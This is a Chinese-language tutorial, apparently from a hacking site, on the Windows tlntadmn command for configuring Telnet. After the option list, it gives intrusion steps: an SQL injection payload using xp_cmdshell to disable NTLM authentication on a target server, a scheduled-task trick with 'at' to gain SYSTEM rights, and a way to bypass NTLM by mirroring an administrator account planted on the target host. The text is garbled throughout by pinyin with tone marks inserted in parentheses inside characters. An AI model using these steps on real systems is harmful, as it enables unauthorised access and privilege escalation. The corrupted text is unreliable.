telnet可以幫助我們完成遠(yuǎn)程的登錄設(shè)置，那么管理員如何對(duì)端口認(rèn)證等系統(tǒng)進(jìn)行管理呢？這里我們就來(lái)介紹一下tlntadmn命令的用法。這個(gè)命令可以幫助我們完成telnet服務(wù)的這些設(shè)置。那么，tlntadmn是telnet服務(wù)的設(shè)置命令,可以對(duì)telnet服務(wù)的端口、認(rèn)證方式等進(jìn)行設(shè)置:

用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
所有會(huì)話(huà)用 'all'.

-s sessionid                         列出會(huì)話(huà)的信息.  
-k sessionid                         終止會(huì)話(huà).  
-m sessionid                       發(fā)送消息到會(huì)話(huà).  
config                       配置Telnet服務(wù)器參數(shù).  
 
common_options 為:  
-u user       指定要使用其憑據(jù)的用戶(hù)  
-p password     用戶(hù)密碼  
config_options 為:  
dom = domain     設(shè)定用戶(hù)的默認(rèn)域  
ctrlakeymap = yes|no       設(shè)定 ALT 鍵的映射  
timeout = hh:mm:ss     設(shè)定空閑會(huì)話(huà)超時(shí)值   timeoutactive = yes|no         啟用空閑會(huì)話(huà).  
maxfail = attempts       設(shè)定斷開(kāi)前失敗的登錄企圖數(shù).  
maxconn = connections     設(shè)定最大連接數(shù).  
port = number   設(shè)定Telnet端口.  
sec = [+/-]NTLM [+/-]passwd           設(shè)定身份驗(yàn)證機(jī)構(gòu)  
fname = file                         指定審計(jì)文件名.  
fsize = size                 指定審計(jì)文件的最大尺寸(MB).  
mode = console|stream           指定操作模式.  
auditlocation = eventlog|file|both       指定記錄地點(diǎn)  
audit = [+/-]user [+/-]fail [+/-]admin     指定審計(jì)的事件 

使用的辦法:

直接運(yùn)行命令:tlntadmn config sec = -ntlm

注射的話(huà)可以直接運(yùn)行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--運(yùn)行以后就去掉了ntlm認(rèn)證.

C:\>tlntadmn config sec = -ntlm -----------------使用admin權(quán)限  
C:\>at 20:43 /interactive "cmd" -----------at命令啟用system權(quán)限  
新加了一項(xiàng)作業(yè),其作業(yè) ID = 1 
C:\WINNT\system32>tlntadmn config sec = -ntlm 

去除NTML驗(yàn)證的另一個(gè)方法:在目標(biāo)主機(jī)上建立好一個(gè)管理員用戶(hù)!在本機(jī)建立一個(gè)和目標(biāo)主機(jī)上相同的帳號(hào)密碼的用戶(hù),在本機(jī)CMD上右擊選擇運(yùn)行方式~ 輸入該帳號(hào)和密碼,直接Telnet服務(wù)的目標(biāo)IP, 既可直接饒過(guò)NTML驗(yàn)證.